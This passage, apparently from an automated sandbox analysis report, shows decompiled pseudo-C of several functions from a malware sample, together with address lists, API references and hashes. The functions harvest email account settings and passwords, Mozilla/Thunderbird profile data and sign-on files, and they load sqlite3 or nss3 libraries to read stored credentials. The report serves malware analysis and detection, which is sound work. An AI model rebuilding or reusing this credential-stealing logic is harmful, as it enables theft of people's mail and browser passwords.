					_t63 = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x1690) = _t63;
				}
				_push("NNTP_Secure_Connection");
				_push(_t196);
				L004120B4();
				if(_t63 == 0) {
					L41:
					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406541(E00406BA3( *((intOrPtr*)(_t201 + 0x460))));
				} else {
					_push("IMAP_Secure_Connection");
					_push(_t196);
					L004120B4();
					if(_t63 == 0) {
						goto L41;
					} else {
						_push("POP3_Secure_Connection");
						_push(_t196);
						L004120B4();
						if(_t63 == 0) {
							goto L41;
						}
					}
				}
				return 1;
			}























                                                                                                                                                                  0x00410d67
                                                                                                                                                                  0x00410d6b
                                                                                                                                                                  0x00410d87
                                                                                                                                                                  0x00410d89
                                                                                                                                                                  0x00410d9e
                                                                                                                                                                  0x00410da7
                                                                                                                                                                  0x00410dad
                                                                                                                                                                  0x00410db3
                                                                                                                                                                  0x00410db8
                                                                                                                                                                  0x00410dbe
                                                                                                                                                                  0x00410dce
                                                                                                                                                                  0x00410dd6
                                                                                                                                                                  0x00410ddc
                                                                                                                                                                  0x00410de2
                                                                                                                                                                  0x00410de7
                                                                                                                                                                  0x00410df7
                                                                                                                                                                  0x00410dff
                                                                                                                                                                  0x00410e05
                                                                                                                                                                  0x00410e0b
                                                                                                                                                                  0x00410e10
                                                                                                                                                                  0x00410e20
                                                                                                                                                                  0x00410e28
                                                                                                                                                                  0x00410e2e
                                                                                                                                                                  0x00410e34
                                                                                                                                                                  0x00410e39
                                                                                                                                                                  0x00410e49
                                                                                                                                                                  0x00410e51
                                                                                                                                                                  0x00410e57
                                                                                                                                                                  0x00410e5d
                                                                                                                                                                  0x00410e62
                                                                                                                                                                  0x00410e72
                                                                                                                                                                  0x00410e7a
                                                                                                                                                                  0x00410e80
                                                                                                                                                                  0x00410e86
                                                                                                                                                                  0x00410e8c
                                                                                                                                                                  0x00410e8c
                                                                                                                                                                  0x00410ea5
                                                                                                                                                                  0x00410ead
                                                                                                                                                                  0x00410eb3
                                                                                                                                                                  0x00410eb9
                                                                                                                                                                  0x00410ebf
                                                                                                                                                                  0x00410ebf
                                                                                                                                                                  0x00410ed8
                                                                                                                                                                  0x00410ee0
                                                                                                                                                                  0x00410ee6
                                                                                                                                                                  0x00410eec
                                                                                                                                                                  0x00410ef2
                                                                                                                                                                  0x00410ef2
                                                                                                                                                                  0x00410f0b
                                                                                                                                                                  0x00410f13
                                                                                                                                                                  0x00410f19
                                                                                                                                                                  0x00410f1f
                                                                                                                                                                  0x00410f25
                                                                                                                                                                  0x00410f25
                                                                                                                                                                  0x00410f35
                                                                                                                                                                  0x00410f3a
                                                                                                                                                                  0x00410f3e
                                                                                                                                                                  0x00410f53
                                                                                                                                                                  0x00410f53
                                                                                                                                                                  0x00410f5e
                                                                                                                                                                  0x00410f63
                                                                                                                                                                  0x00410f67
                                                                                                                                                                  0x00410f7c
                                                                                                                                                                  0x00410f7c
                                                                                                                                                                  0x00410f87
                                                                                                                                                                  0x00410f8c
                                                                                                                                                                  0x00410f90
                                                                                                                                                                  0x00410fa5
                                                                                                                                                                  0x00410fa5
                                                                                                                                                                  0x00410fb0
                                                                                                                                                                  0x00410fb5
                                                                                                                                                                  0x00410fb9
                                                                                                                                                                  0x00410fce
                                                                                                                                                                  0x00410fce
                                                                                                                                                                  0x00410fe2
                                                                                                                                                                  0x00410ff6
                                                                                                                                                                  0x00410ffb
                                                                                                                                                                  0x00411002
                                                                                                                                                                  0x0041100b
                                                                                                                                                                  0x0041100d
                                                                                                                                                                  0x00411022
                                                                                                                                                                  0x00411037
                                                                                                                                                                  0x0041103c
                                                                                                                                                                  0x0041103d
                                                                                                                                                                  0x00411042
                                                                                                                                                                  0x00411048
                                                                                                                                                                  0x00411049
                                                                                                                                                                  0x00411052
                                                                                                                                                                  0x00411060
                                                                                                                                                                  0x00411066
                                                                                                                                                                  0x00411066
                                                                                                                                                                  0x0041106c
                                                                                                                                                                  0x00411071
                                                                                                                                                                  0x00411072
                                                                                                                                                                  0x0041107b
                                                                                                                                                                  0x0041109f
                                                                                                                                                                  0x004110ab
                                                                                                                                                                  0x004110b1
                                                                                                                                                                  0x0041107d
                                                                                                                                                                  0x0041107d
                                                                                                                                                                  0x00411082
                                                                                                                                                                  0x00411083
                                                                                                                                                                  0x0041108c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041108e
                                                                                                                                                                  0x0041108e
                                                                                                                                                                  0x00411093
                                                                                                                                                                  0x00411094
                                                                                                                                                                  0x0041109d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041109d
                                                                                                                                                                  0x0041108c
                                                                                                                                                                  0x004110b7
                                                                                                                                                                  0x004110bc
                                                                                                                                                                  0x004110bd
                                                                                                                                                                  0x004110c6
                                                                                                                                                                  0x004110d4
                                                                                                                                                                  0x004110da
                                                                                                                                                                  0x004110da
                                                                                                                                                                  0x004110e0
                                                                                                                                                                  0x004110e5
                                                                                                                                                                  0x004110e6
                                                                                                                                                                  0x004110ef
                                                                                                                                                                  0x00411113
                                                                                                                                                                  0x00411125
                                                                                                                                                                  0x004110f1
                                                                                                                                                                  0x004110f1
                                                                                                                                                                  0x004110f6
                                                                                                                                                                  0x004110f7
                                                                                                                                                                  0x00411100
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00411102
                                                                                                                                                                  0x00411102
                                                                                                                                                                  0x00411107
                                                                                                                                                                  0x00411108
                                                                                                                                                                  0x00411111
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00411111
                                                                                                                                                                  0x00411100
                                                                                                                                                                  0x00411132

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcmp$_stricmp$memcpystrlen
                                                                                                                                                                  • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                  • API String ID: 1113949926-2499304436
                                                                                                                                                                  • Opcode ID: 0a2286a2ee10144d1cd19d55ef64d0b704ba42cbf857e026c28c1a280e809191
                                                                                                                                                                  • Instruction ID: fdd8238c1ffaca80b8f1a937c0ff3988063f93198c4aeb5310ca970d52cdd6dd
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a2286a2ee10144d1cd19d55ef64d0b704ba42cbf857e026c28c1a280e809191
                                                                                                                                                                  • Instruction Fuzzy Hash: 8E9160B21097049DE628B632ED02BDB73D8AF4431CF21052FF55AE6182EEBDB991465C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040C9AA, Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                  			E0040C9AA(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void _v271;
				char _v272;
				void* __ebx;
				void* __edi;
				int _t64;
				int _t66;
				int _t68;
				int _t69;
				int _t72;
				int _t85;
				void* _t91;
				void* _t132;
				char* _t133;
				char* _t135;
				char* _t137;
				char* _t139;
				intOrPtr _t151;
				int _t153;
				int _t154;
				void* _t155;

				_t132 = __edx;
				_v12 = __ecx;
				_v272 = 0;
				memset( &_v271, 0, 0xff);
				_t133 = "mail.account.account";
				_t64 = strlen(_t133);
				_t148 = _t64;
				_t134 = _a4;
				if(strncmp(_a4, _t133, _t64) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C923(_t134,  &_v16, _t148);
				}
				if(_v8 != 0) {
					_push("identities");
					_push(_v8);
					L00412072();
					if(_t91 == 0) {
						_t17 = _t155 + 0x604; // 0x604
						E004060DA(0xff, _t17, _a8);
					}
				}
				_t135 = "mail.server";
				_t66 = strlen(_t135);
				_t149 = _t66;
				_t136 = _a4;
				if(strncmp(_a4, _t135, _t66) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C8CE(_t149, _t136,  &_v272);
				}
				if(_v8 != 0) {
					_t85 = E0040CC58(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("username");
					_push(_v8);
					_t154 = _t85;
					L00412072();
					if(_t85 == 0) {
						_t28 = _t154 + 0x204; // 0x204
						_t85 = E004060DA(0xff, _t28, _a8);
					}
					_push("type");
					_push(_v8);
					L00412072();
					if(_t85 == 0) {
						_t31 = _t154 + 0x504; // 0x504
						_t85 = E004060DA(0xff, _t31, _a8);
					}
					_push("hostname");
					_push(_v8);
					L00412072();
					if(_t85 == 0) {
						_t34 = _t154 + 0x104; // 0x104
						_t85 = E004060DA(0xff, _t34, _a8);
					}
					_push("port");
					_push(_v8);
					L00412072();
					if(_t85 == 0) {
						_t85 = atoi(_a8);
						 *(_t154 + 0x804) = _t85;
					}
					_push("useSecAuth");
					_push(_v8);
					L00412072();
					if(_t85 == 0) {
						_push("true");
						_push(_a8);
						L00412072();
						if(_t85 == 0) {
							 *((intOrPtr*)(_t154 + 0x808)) = 1;
						}
					}
				}
				_t137 = "mail.identity";
				_t68 = strlen(_t137);
				_t150 = _t68;
				_t138 = _a4;
				_t69 = strncmp(_a4, _t137, _t68);
				if(_t69 != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_t69 = E0040C8CE(_t150, _t138,  &_v272);
					_v8 = _t69;
				}
				if(_v8 != 0) {
					_t69 = E0040CC58(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("useremail");
					_push(_v8);
					_t153 = _t69;
					L00412072();
					if(_t69 == 0) {
						_t51 = _t153 + 0x404; // 0x404
						_t69 = E004060DA(0xff, _t51, _a8);
					}
					_push("fullname");
					_push(_v8);
					L00412072();
					if(_t69 == 0) {
						_t54 = _t153 + 4; // 0x4
						_t69 = E004060DA(0xff, _t54, _a8);
					}
				}
				_push("signon.signonfilename");
				_push(_a4);
				L00412072();
				if(_t69 == 0) {
					_t151 = _v12;
					_t139 = _t151 + 0x245;
					_t152 = _t151 + 0x140;
					_t72 = strlen(_t151 + 0x140);
					_t60 = strlen(_a8) + 1; // 0x1
					if(_t72 + _t60 >= 0x104) {
						 *_t139 = 0;
					} else {
						E004062B7(_t139, _t152, _a8);
					}
				}
				return 1;
			}


























                                                                                                                                                                  0x0040c9aa
                                                                                                                                                                  0x0040c9c5
                                                                                                                                                                  0x0040c9c8
                                                                                                                                                                  0x0040c9cf
                                                                                                                                                                  0x0040c9d4
                                                                                                                                                                  0x0040c9da
                                                                                                                                                                  0x0040c9df
                                                                                                                                                                  0x0040c9e3
                                                                                                                                                                  0x0040c9f1
                                                                                                                                                                  0x0040ca02
                                                                                                                                                                  0x0040c9f3
                                                                                                                                                                  0x0040c9fd
                                                                                                                                                                  0x0040c9fd
                                                                                                                                                                  0x0040ca0a
                                                                                                                                                                  0x0040ca3e
                                                                                                                                                                  0x0040ca43
                                                                                                                                                                  0x0040ca46
                                                                                                                                                                  0x0040ca4f
                                                                                                                                                                  0x0040ca54
                                                                                                                                                                  0x0040ca5a
                                                                                                                                                                  0x0040ca5f
                                                                                                                                                                  0x0040ca4f
                                                                                                                                                                  0x0040ca60
                                                                                                                                                                  0x0040ca66
                                                                                                                                                                  0x0040ca6b
                                                                                                                                                                  0x0040ca6f
                                                                                                                                                                  0x0040ca7d
                                                                                                                                                                  0x0040ca92
                                                                                                                                                                  0x0040ca7f
                                                                                                                                                                  0x0040ca8d
                                                                                                                                                                  0x0040ca8d
                                                                                                                                                                  0x0040ca9a
                                                                                                                                                                  0x0040caad
                                                                                                                                                                  0x0040cab2
                                                                                                                                                                  0x0040cab7
                                                                                                                                                                  0x0040caba
                                                                                                                                                                  0x0040cabc
                                                                                                                                                                  0x0040cac5
                                                                                                                                                                  0x0040caca
                                                                                                                                                                  0x0040cad0
                                                                                                                                                                  0x0040cad5
                                                                                                                                                                  0x0040cad6
                                                                                                                                                                  0x0040cadb
                                                                                                                                                                  0x0040cade
                                                                                                                                                                  0x0040cae7
                                                                                                                                                                  0x0040caec
                                                                                                                                                                  0x0040caf2
                                                                                                                                                                  0x0040caf7
                                                                                                                                                                  0x0040caf8
                                                                                                                                                                  0x0040cafd
                                                                                                                                                                  0x0040cb00
                                                                                                                                                                  0x0040cb09
                                                                                                                                                                  0x0040cb0e
                                                                                                                                                                  0x0040cb14
                                                                                                                                                                  0x0040cb19
                                                                                                                                                                  0x0040cb1a
                                                                                                                                                                  0x0040cb1f
                                                                                                                                                                  0x0040cb22
                                                                                                                                                                  0x0040cb2b
                                                                                                                                                                  0x0040cb30
                                                                                                                                                                  0x0040cb36
                                                                                                                                                                  0x0040cb36
                                                                                                                                                                  0x0040cb3c
                                                                                                                                                                  0x0040cb41
                                                                                                                                                                  0x0040cb44
                                                                                                                                                                  0x0040cb4d
                                                                                                                                                                  0x0040cb4f
                                                                                                                                                                  0x0040cb54
                                                                                                                                                                  0x0040cb57
                                                                                                                                                                  0x0040cb60
                                                                                                                                                                  0x0040cb62
                                                                                                                                                                  0x0040cb62
                                                                                                                                                                  0x0040cb60
                                                                                                                                                                  0x0040cb4d
                                                                                                                                                                  0x0040cb6c
                                                                                                                                                                  0x0040cb72
                                                                                                                                                                  0x0040cb77
                                                                                                                                                                  0x0040cb7b
                                                                                                                                                                  0x0040cb7f
                                                                                                                                                                  0x0040cb89
                                                                                                                                                                  0x0040cb9e
                                                                                                                                                                  0x0040cb8b
                                                                                                                                                                  0x0040cb94
                                                                                                                                                                  0x0040cb99
                                                                                                                                                                  0x0040cb99
                                                                                                                                                                  0x0040cba6
                                                                                                                                                                  0x0040cbb5
                                                                                                                                                                  0x0040cbba
                                                                                                                                                                  0x0040cbbf
                                                                                                                                                                  0x0040cbc2
                                                                                                                                                                  0x0040cbc4
                                                                                                                                                                  0x0040cbcd
                                                                                                                                                                  0x0040cbd2
                                                                                                                                                                  0x0040cbd8
                                                                                                                                                                  0x0040cbdd
                                                                                                                                                                  0x0040cbde
                                                                                                                                                                  0x0040cbe3
                                                                                                                                                                  0x0040cbe6
                                                                                                                                                                  0x0040cbef
                                                                                                                                                                  0x0040cbf4
                                                                                                                                                                  0x0040cbf7
                                                                                                                                                                  0x0040cbfc
                                                                                                                                                                  0x0040cbef
                                                                                                                                                                  0x0040cbfd
                                                                                                                                                                  0x0040cc02
                                                                                                                                                                  0x0040cc05
                                                                                                                                                                  0x0040cc0e
                                                                                                                                                                  0x0040cc10
                                                                                                                                                                  0x0040cc13
                                                                                                                                                                  0x0040cc19
                                                                                                                                                                  0x0040cc20
                                                                                                                                                                  0x0040cc2f
                                                                                                                                                                  0x0040cc3a
                                                                                                                                                                  0x0040cc4b
                                                                                                                                                                  0x0040cc3c
                                                                                                                                                                  0x0040cc42
                                                                                                                                                                  0x0040cc48
                                                                                                                                                                  0x0040cc3a
                                                                                                                                                                  0x0040cc55

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040C9CF
                                                                                                                                                                  • strlen.MSVCRT ref: 0040C9DA
                                                                                                                                                                  • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C9E7
                                                                                                                                                                  • _stricmp.MSVCRT(00000000,server), ref: 0040CA24
                                                                                                                                                                  • _stricmp.MSVCRT(00000000,identities), ref: 0040CA46
                                                                                                                                                                  • strlen.MSVCRT ref: 0040CA66
                                                                                                                                                                  • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040CA73
                                                                                                                                                                  • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040CABC
                                                                                                                                                                  • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040CADE
                                                                                                                                                                  • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040CB00
                                                                                                                                                                  • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040CB22
                                                                                                                                                                  • atoi.MSVCRT ref: 0040CB30
                                                                                                                                                                    • Part of subcall function 0040C923: memset.MSVCRT ref: 0040C959
                                                                                                                                                                    • Part of subcall function 0040C923: memcpy.MSVCRT ref: 0040C97B
                                                                                                                                                                    • Part of subcall function 0040C923: atoi.MSVCRT ref: 0040C98F
                                                                                                                                                                  • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040CB44
                                                                                                                                                                  • _stricmp.MSVCRT(?,true,00000000), ref: 0040CB57
                                                                                                                                                                  • strlen.MSVCRT ref: 0040CB72
                                                                                                                                                                  • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040CB7F
                                                                                                                                                                  • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040CBC4
                                                                                                                                                                  • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CBE6
                                                                                                                                                                  • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CC05
                                                                                                                                                                  • strlen.MSVCRT ref: 0040CC20
                                                                                                                                                                  • strlen.MSVCRT ref: 0040CC2A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                                                                                                                                                                  • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                                  • API String ID: 736090197-593045482
                                                                                                                                                                  • Opcode ID: c049cdfae9ca141b10bbd91dfc467443bb183352d5b84e1e83dacad5e1e92eca
                                                                                                                                                                  • Instruction ID: 863115145772795da6afe78a2776049e9b2399cf567c3eb7605af69a2dd2c254
                                                                                                                                                                  • Opcode Fuzzy Hash: c049cdfae9ca141b10bbd91dfc467443bb183352d5b84e1e83dacad5e1e92eca
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F71C432504209FEEB10EB61DD42BDE77A5DF50328F20426BF945B21D1EB7CAE919A4C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040FCBC, Relevance: 61.4, APIs: 22, Strings: 13, Instructions: 143libraryloaderstringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040FCBC(intOrPtr* __esi, char* _a4) {
				void _v283;
				char _v284;
				void _v547;
				char _v548;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t61;
				void* _t70;
				struct HINSTANCE__* _t74;
				CHAR* _t91;
				intOrPtr* _t93;
				void* _t94;
				void* _t95;
				void* _t96;

				_t93 = __esi;
				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
					L16:
					return 1;
				}
				_v284 = 0;
				memset( &_v283, 0, 0x117);
				_t95 = _t94 + 0xc;
				if(_a4 == 0) {
					E0040FAA6( &_v284);
				} else {
					strcpy( &_v284, _a4);
				}
				if(_v284 == 0) {
					_t91 = "sqlite3.dll";
					_t49 = GetModuleHandleA(_t91);
					 *(_t93 + 0x24) = _t49;
					if(_t49 != 0) {
						goto L14;
					}
					_t61 = LoadLibraryA(_t91);
					goto L13;
				} else {
					_v548 = 0;
					memset( &_v547, 0, 0x104);
					strcpy( &_v548,  &_v284);
					strcat( &_v284, "\\sqlite3.dll");
					_t70 = E00406155( &_v284);
					_t96 = _t95 + 0x20;
					if(_t70 == 0) {
						strcpy( &_v284,  &_v548);
						strcat( &_v284, "\\mozsqlite3.dll");
						_t96 = _t96 + 0x10;
					}
					if(E00406155( &_v284) == 0) {
						strcpy( &_v284,  &_v548);
						strcat( &_v284, "\\nss3.dll");
					}
					_t74 = GetModuleHandleA( &_v284);
					 *(_t93 + 0x24) = _t74;
					if(_t74 != 0) {
						L14:
						_t50 =  *(_t93 + 0x24);
						if(_t50 == 0) {
							return 0;
						}
						 *_t93 = GetProcAddress(_t50, "sqlite3_open");
						 *((intOrPtr*)(_t93 + 4)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_prepare");
						 *((intOrPtr*)(_t93 + 8)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_step");
						 *((intOrPtr*)(_t93 + 0xc)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_column_text");
						 *((intOrPtr*)(_t93 + 0x10)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_column_int");
						 *((intOrPtr*)(_t93 + 0x14)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_column_int64");
						 *((intOrPtr*)(_t93 + 0x18)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_finalize");
						 *((intOrPtr*)(_t93 + 0x1c)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_close");
						 *((intOrPtr*)(_t93 + 0x20)) = GetProcAddress( *(_t93 + 0x24), "sqlite3_exec");
						goto L16;
					} else {
						_t61 = LoadLibraryExA( &_v284, 0, 8);
						L13:
						 *(_t93 + 0x24) = _t61;
						goto L14;
					}
				}
			}

















                                                                                                                                                                  0x0040fcbc
                                                                                                                                                                  0x0040fccc
                                                                                                                                                                  0x0040fe8a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fe8c
                                                                                                                                                                  0x0040fcdf
                                                                                                                                                                  0x0040fce5
                                                                                                                                                                  0x0040fcea
                                                                                                                                                                  0x0040fcf6
                                                                                                                                                                  0x0040fd05
                                                                                                                                                                  0x0040fcf8
                                                                                                                                                                  0x0040fcfc
                                                                                                                                                                  0x0040fd02
                                                                                                                                                                  0x0040fd10
                                                                                                                                                                  0x0040fdea
                                                                                                                                                                  0x0040fdf0
                                                                                                                                                                  0x0040fdf8
                                                                                                                                                                  0x0040fdfb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fdfe
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fd16
                                                                                                                                                                  0x0040fd23
                                                                                                                                                                  0x0040fd29
                                                                                                                                                                  0x0040fd3c
                                                                                                                                                                  0x0040fd4d
                                                                                                                                                                  0x0040fd59
                                                                                                                                                                  0x0040fd5e
                                                                                                                                                                  0x0040fd63
                                                                                                                                                                  0x0040fd73
                                                                                                                                                                  0x0040fd84
                                                                                                                                                                  0x0040fd89
                                                                                                                                                                  0x0040fd89
                                                                                                                                                                  0x0040fd9b
                                                                                                                                                                  0x0040fdab
                                                                                                                                                                  0x0040fdbc
                                                                                                                                                                  0x0040fdc1
                                                                                                                                                                  0x0040fdcb
                                                                                                                                                                  0x0040fdd3
                                                                                                                                                                  0x0040fdd6
                                                                                                                                                                  0x0040fe07
                                                                                                                                                                  0x0040fe07
                                                                                                                                                                  0x0040fe0c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fe93
                                                                                                                                                                  0x0040fe28
                                                                                                                                                                  0x0040fe34
                                                                                                                                                                  0x0040fe41
                                                                                                                                                                  0x0040fe4e
                                                                                                                                                                  0x0040fe5b
                                                                                                                                                                  0x0040fe68
                                                                                                                                                                  0x0040fe75
                                                                                                                                                                  0x0040fe82
                                                                                                                                                                  0x0040fe87
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fdd8
                                                                                                                                                                  0x0040fde2
                                                                                                                                                                  0x0040fe04
                                                                                                                                                                  0x0040fe04
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040fe04
                                                                                                                                                                  0x0040fdd6

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040FCE5
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040FCFC
                                                                                                                                                                  • memset.MSVCRT ref: 0040FD29
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040FD3C
                                                                                                                                                                  • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040FD4D
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FD73
                                                                                                                                                                  • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FD84
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDAB
                                                                                                                                                                  • strcat.MSVCRT(?,\nss3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDBC
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDCB
                                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FDE2
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDF0
                                                                                                                                                                  • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040FDFE
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040FE1E
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040FE2A
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040FE37
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040FE44
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040FE51
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040FE5E
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040FE6B
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040FE78
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040FE85
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$strcpy$strcat$HandleLibraryLoadModulememset
                                                                                                                                                                  • String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                                                                                                  • API String ID: 2571629209-2385123308
                                                                                                                                                                  • Opcode ID: f879ae07ce377879295b5903e709fdbb1205cb1f9dca58ec31e17bd31d5cb62c
                                                                                                                                                                  • Instruction ID: c8562112cbf9eae777f2394b99ada5fc335e217e34df457794dbf1c8b1b14659
                                                                                                                                                                  • Opcode Fuzzy Hash: f879ae07ce377879295b5903e709fdbb1205cb1f9dca58ec31e17bd31d5cb62c
                                                                                                                                                                  • Instruction Fuzzy Hash: 86516371900308AECB30EFA1DD45ECB7BF8AF58704F10497BE649E2641E678E6858F58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040D003, Relevance: 52.8, APIs: 20, Strings: 10, Instructions: 287stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                  			E0040D003(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char* _a8) {
				char* _v8;
				char* _v12;
				char* _v16;
				intOrPtr _v20;
				char _v36;
				int _v40;
				char _v60;
				char _v92;
				char _v108;
				char _v132;
				char _v164;
				void _v419;
				int _v420;
				void _v675;
				int _v676;
				void _v1291;
				char _v1292;
				void _v1907;
				char _v1908;
				void _v2523;
				char _v2524;
				char _v3548;
				char _v4572;
				char _v5596;
				char _v6620;
				char _v7644;
				void _v8667;
				char _v8668;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t91;
				signed int _t92;
				signed int _t93;
				intOrPtr* _t101;
				void* _t109;
				char* _t122;
				signed int _t148;
				char* _t149;
				signed int _t150;
				signed int _t157;
				signed int _t159;
				int _t175;
				void* _t207;
				void* _t208;
				intOrPtr _t209;
				char* _t213;
				intOrPtr _t215;
				signed int _t216;
				void* _t218;
				intOrPtr _t221;
				char* _t225;
				void* _t229;
				void* _t230;
				void* _t231;

				_t207 = __edx;
				E00412360(0x21dc, __ecx);
				_t209 = _a4;
				_t221 = _t209 + 0x30;
				_v20 = _t221;
				_t91 = E0040E54C(_t221, _t209 + 0x362);
				if(_t91 == 0) {
					return _t91;
				}
				_t92 =  *(_t221 + 4);
				_t175 = 0;
				if(_t92 == 0) {
					_t93 = _t92 | 0xffffffff;
					__eflags = _t93;
				} else {
					_t93 =  *_t92(_t209);
				}
				_t235 = _t93 - _t175;
